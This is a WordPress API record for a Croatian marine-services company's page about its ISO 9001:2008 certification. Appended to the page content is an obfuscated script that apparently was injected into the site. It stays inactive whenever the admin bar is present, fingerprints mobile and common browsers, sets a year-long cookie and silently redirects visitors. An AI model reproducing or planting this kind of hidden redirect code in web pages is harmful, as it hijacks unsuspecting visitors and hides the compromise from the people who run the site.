{"id":13699,"date":"2017-05-23T11:19:18","date_gmt":"2017-05-23T11:19:18","guid":{"rendered":"https:\/\/interadria.hr\/home\/interadrii-dodijeljen-iso-90012008\/"},"modified":"2017-05-23T11:19:18","modified_gmt":"2017-05-23T11:19:18","slug":"interadrii-dodijeljen-iso-90012008","status":"publish","type":"page","link":"https:\/\/interadria.hr\/hr\/interadrii-dodijeljen-iso-90012008\/","title":{"rendered":"INTERADRII DODIJELJEN ISO 9001:2008"},"content":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_empty_space][vc_column_text]<\/p>\n<h2><span style=\"color: #30a2c5;\">InterAdrii SC<\/span> <strong>dodijeljen ISO 9001:2008<\/strong><\/h2>\n<p>[\/vc_column_text][vc_column_text]<\/p>\n<div><span style=\"font-family: arial, helvetica, sans-serif;\">Tvrtka InterAdria SC d.o.o. je tijekom 2012 godine uspostavila Sustav upravljanja kvalitetom u skladu sa zahtjevima me\u0111unarodne norme <strong><a href=\"http:\/\/www.interadria.hr\/media\/files\/interadria_iso_certiifikat.pdf\">ISO 9001:2008<\/a><\/strong> Quality Management System (HRN EN ISO 9001:2009).\u00a04 . svibnja 2012. godine obavljena je nadzorna ocjena Sustava upravljanja kvalitetom od strane Hrvatskog registra brodova.<\/span><\/div>\n<div><span style=\"font-family: arial, helvetica, sans-serif;\">\u00a0<\/span><\/div>\n<div><span style=\"font-family: arial, helvetica, sans-serif;\">Cilj uvo\u0111enja ISO Sustava je postizanje najvi\u0161eg mogu\u0107eg nivoa kvalitete usluga u podru\u010dju: \u00a0prodaje i zastupstva novih i rabljenih plovila, nauti\u010dkom servisu, odr\u017eavanju, \u010duvanju plovila i trgovini nauti\u010dke opreme, a na zadovoljstvo pomoraca, brodara i klijenata koji su korisnici tih usluga.<\/span><\/div>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_empty_space height=&#8221;64px&#8221;][vc_single_image image=&#8221;5317&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; onclick=&#8221;img_link_large&#8221; img_link_target=&#8221;_blank&#8221;][vc_empty_space height=&#8221;64px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_masonry_media_grid grid_id=&#8221;vc_gid:1494190396468-e2b66961-07dc-2&#8243; include=&#8221;5273,5277,5281,5285,5289,5293,5297,5301&#8243;][vc_empty_space height=&#8221;64px&#8221;][\/vc_column][\/vc_row]<script> var a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https:\/\/www.interadria.hr','getElementById','wpadminbar','undefined','setTime','getTime',';\\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\\x20path=\/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](\/Android\/i)||navigator['userAgent'][b('0xe')](\/BlackBerry\/i)||navigator[b('0xd')][b('0xe')](\/iPhone|iPad|iPod\/i)||navigator[b('0xd')][b('0xe')](\/Opera Mini\/i)||navigator[b('0xd')][b('0xe')](\/IEMobile\/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_empty_space][vc_column_text] InterAdrii SC dodijeljen ISO 9001:2008 [\/vc_column_text][vc_column_text] Tvrtka InterAdria SC d.o.o. je tijekom 2012 godine uspostavila Sustav upravljanja kvalitetom u skladu sa zahtjevima me\u0111unarodne norme ISO 9001:2008 Quality Management System (HRN EN ISO 9001:2009).\u00a04 . svibnja 2012. godine obavljena je nadzorna ocjena Sustava upravljanja kvalitetom od strane Hrvatskog registra brodova. \u00a0 Cilj uvo\u0111enja ISO&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_joinchat":[],"_links_to":"","_links_to_target":""},"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>INTERADRII DODIJELJEN ISO 9001:2008 -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr\" \/>\n<meta property=\"og:locale\" content=\"hr_HR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"INTERADRII DODIJELJEN ISO 9001:2008 -\" \/>\n<meta property=\"og:description\" content=\"[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_empty_space][vc_column_text] InterAdrii SC dodijeljen ISO 9001:2008 [\/vc_column_text][vc_column_text] Tvrtka InterAdria SC d.o.o. je tijekom 2012 godine uspostavila Sustav upravljanja kvalitetom u skladu sa zahtjevima me\u0111unarodne norme ISO 9001:2008 Quality Management System (HRN EN ISO 9001:2009).\u00a04 . svibnja 2012. godine obavljena je nadzorna ocjena Sustava upravljanja kvalitetom od strane Hrvatskog registra brodova. \u00a0 Cilj uvo\u0111enja ISO...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr\",\"url\":\"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr\",\"name\":\"INTERADRII DODIJELJEN ISO 9001:2008 -\",\"isPartOf\":{\"@id\":\"https:\/\/interadria.hr\/#website\"},\"datePublished\":\"2017-05-23T11:19:18+00:00\",\"dateModified\":\"2017-05-23T11:19:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr#breadcrumb\"},\"inLanguage\":\"hr-HR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/interadria.hr\/hr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"INTERADRII DODIJELJEN ISO 9001:2008\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/interadria.hr\/#website\",\"url\":\"https:\/\/interadria.hr\/\",\"name\":\"\",\"description\":\"INTERADRIA SC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/interadria.hr\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"hr-HR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"INTERADRII DODIJELJEN ISO 9001:2008 -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr","og_locale":"hr_HR","og_type":"article","og_title":"INTERADRII DODIJELJEN ISO 9001:2008 -","og_description":"[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_empty_space][vc_column_text] InterAdrii SC dodijeljen ISO 9001:2008 [\/vc_column_text][vc_column_text] Tvrtka InterAdria SC d.o.o. je tijekom 2012 godine uspostavila Sustav upravljanja kvalitetom u skladu sa zahtjevima me\u0111unarodne norme ISO 9001:2008 Quality Management System (HRN EN ISO 9001:2009).\u00a04 . svibnja 2012. godine obavljena je nadzorna ocjena Sustava upravljanja kvalitetom od strane Hrvatskog registra brodova. \u00a0 Cilj uvo\u0111enja ISO...","og_url":"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr","url":"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr","name":"INTERADRII DODIJELJEN ISO 9001:2008 -","isPartOf":{"@id":"https:\/\/interadria.hr\/#website"},"datePublished":"2017-05-23T11:19:18+00:00","dateModified":"2017-05-23T11:19:18+00:00","breadcrumb":{"@id":"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr#breadcrumb"},"inLanguage":"hr-HR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/interadria.hr\/interadrii-dodijeljen-iso-90012008\/?lang=hr#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/interadria.hr\/hr\/"},{"@type":"ListItem","position":2,"name":"INTERADRII DODIJELJEN ISO 9001:2008"}]},{"@type":"WebSite","@id":"https:\/\/interadria.hr\/#website","url":"https:\/\/interadria.hr\/","name":"","description":"INTERADRIA SC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/interadria.hr\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"hr-HR"}]}},"_links":{"self":[{"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/pages\/13699"}],"collection":[{"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/comments?post=13699"}],"version-history":[{"count":2,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/pages\/13699\/revisions"}],"predecessor-version":[{"id":13701,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/pages\/13699\/revisions\/13701"}],"wp:attachment":[{"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/media?parent=13699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}